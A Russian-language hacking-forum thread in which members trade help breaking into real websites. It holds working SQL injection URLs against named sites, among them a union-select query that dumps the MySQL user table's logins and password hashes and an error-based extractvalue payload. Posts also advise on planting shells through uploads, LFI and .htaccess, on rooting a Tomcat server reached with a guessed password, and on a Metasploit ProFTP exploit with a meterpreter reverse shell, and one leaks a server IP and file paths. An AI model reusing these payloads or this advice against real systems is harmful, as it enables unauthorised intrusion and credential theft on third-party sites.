Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Смотря при каких обстоятельствах.

    Из под админки загрузить файл с вредоносом - одно, при LFI - уже совсем другое, обойти преобразование типов, resize - вообще третье.

    Так что информации очень мало для однозначного ответа.
     
    _________________________
  2. CoolHucker

    CoolHucker New Member

    Joined:
    12 Feb 2013
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Никто не поможет?)
     
  3. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Шелл можно вписать в любой из этих форматов. Другое дело, что при нормальных настройках ни один из них не будет исполняться веб-сервером. Поэтому вам надо либо догружать .htaccess, либо делать lfi. Либо же обходить фильтры на формат\расширение.
     
    2 people like this.
  4. Win32BOT

    Win32BOT Member

    Joined:
    4 Mar 2013
    Messages:
    62
    Likes Received:
    10
    Reputations:
    -3
    kompromat.flb.ru/material1.phtml?id=-153+union+select+1,2,3 ,4,5,6,7,8,9,10,11+--+
    Не могу найти путь к корню сайта
     
    1 person likes this.
  5. Sum.cogitans

    Sum.cogitans Elder - Старейшина

    Joined:
    7 Sep 2013
    Messages:
    173
    Likes Received:
    32
    Reputations:
    19
    Я пошел по пути родителя, хотя он уже и на другом сервере: http://flb.ru/user_config.php
    "Fatal error: Class 'User' not found in /var/www/flb.ru/user_config.php on line 10"

    В гуглкеш нашлось такое:
    "Warning: mysql_connect() [function.mysql-connect]: Can't connect to MySQL server on '95.211.1.162' (4) in /home/u475266731/public_html/portal-object/db/dbconnect.obj.php on line 45"

    В общем, я бы посоветовал ковырять в сторону соседей.
     
    1 person likes this.
  6. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    PHP:
    http://agfmpack.ru/page/92'/
    Кто знает как раскрутить?
     
  7. sav77

    sav77 Member

    Joined:
    20 Oct 2010
    Messages:
    55
    Likes Received:
    13
    Reputations:
    0
    Подобрал пароль от Apache Tomcat/7.0.47
    Что можно там сделать? Есть ли способ порутать сервак полностью?
     
  8. AHTNkiller

    AHTNkiller New Member

    Joined:
    7 Sep 2011
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Проблемка
    есть таблица user
    узнаем колонки

    http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579&setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=0x75736572+--+

    Далее делаю
    http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579&setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,group_concat(User,0x3b,Password),4,5+from+user+--+

    И результат: ПУСТОТА!

    Need help!
     
  9. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    укажи с какой БД хочешь вытащить, например mysql

    http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579&setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,group_concat%28User,0x3b,Password%29,4,5+from+mysql.user--

    список БД
     
    1 person likes this.
  10. CoolHucker

    CoolHucker New Member

    Joined:
    12 Feb 2013
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Парни помогите ответить на вопросы,если можно на примерах!
    Если кто-то всё это знает,помогите,Не обижу;)
     
  11. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    сам понял что спросил?

    тебя в гугле забанили?


    омг, ты реально такой тупой или шутишь? в гугл вбиваешь слово лох и вот тебе куча ресурсов

    руками блэть


    та не, нефига)) если бы была выбрана не та БД то написало бы ошибку, нужно вывод взять в substr
     
    #23151 qaz, 12 Mar 2014
    Last edited: 12 Mar 2014
  12. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    deleted
     
    #23152 psihoz26, 13 Mar 2014
    Last edited: 13 Mar 2014
  13. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    ....
     
    1 person likes this.
  14. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    YaBtr где можно почитать про extractvalue?

    ?query=1'*(extractvalue(1,concat(0x3a,uSer(),0x3a,file_priv)+from+mySql.uSer))*%20'&x=0&y=0

    почему не работает? синтаксис у меня кривой или прав нету?
     
  15. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    1. И синтаксис кривой и прав не хватает.

    2. http://dev.mysql.com/doc/refman/5.1/en/xml-functions.html
    Там же написано об updatexml.
     
  16. nike001

    nike001 New Member

    Joined:
    19 Jan 2014
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Юзаю вот этот сплойт proftp_telnet_iac+meterpreter/reverse_tcp. Какой порт нужно прописывать в reverse_tcp(LPORT)? И нужно ли его открывать ?
     
  17. CoolHucker

    CoolHucker New Member

    Joined:
    12 Feb 2013
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Подскажите Парсер сайтов(приват или паблик) зареганных в LIVEINTERNET,TOPMAIL,TOP100RAMBLER,HOTLOG
     
  18. JohnnnDoe

    JohnnnDoe New Member

    Joined:
    2 Nov 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    SQL движок

    Есть несколько скулей типа:
    host.com/page.php?id=19' and 1=(select 1) --

    движок например точно не mysql - запрос c /*!00000 some_shit */ срабатывает - если бы был мускул, была бы ошибка в синтаксисе - some_shit,

    ни Oracle - запрос host.com/page.php?id=19' and 1=(select 1 from sys.dual) -- не работает.

    если бы была mssql или postgre, то в большинстве случаев сработал бы запрос с Select из таблицы information_schema.tables - host.com/page.php?id=19' and 1=(select 1 from information_schema.tables) но не работает.

    и ещё одна особенность - и ни в одной из скуль не проходит запрос с ORDER BY.

    что это может быть за движок?
     
    #23158 JohnnnDoe, 13 Mar 2014
    Last edited: 13 Mar 2014
  19. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Движок или субд? Ссылку в студию\пм, посмотрим на ваш движок и на субд. Причин для невыполнения упомнутых запросов может быть масса, и большая часть не относится непосредственно к самой субд.
     
  20. JohnnnDoe

    JohnnnDoe New Member

    Joined:
    2 Nov 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    madhatter, СУБД.
    сайт находится в локалке, так что от ссылки, к сожалению, не будет толку.
    Если представить, что запрос не фильтруется, то для какой СУБД характерно такое поведение?


    Ещё очень характерная особенность!
    срабатывает такой запрос:
    host.com/page.php?id=19' and 1<(select id)
    то есть можно выбрать колонку id без указания в запросе ключевого слова FROM и таблицы, из которой нужно делать запрос.

    Сам я пока думаю, что выполняется не простой запрос какая-нибудь хранимая процедура.
     
    #23160 JohnnnDoe, 13 Mar 2014
    Last edited: 13 Mar 2014
Thread Status:
Not open for further replies.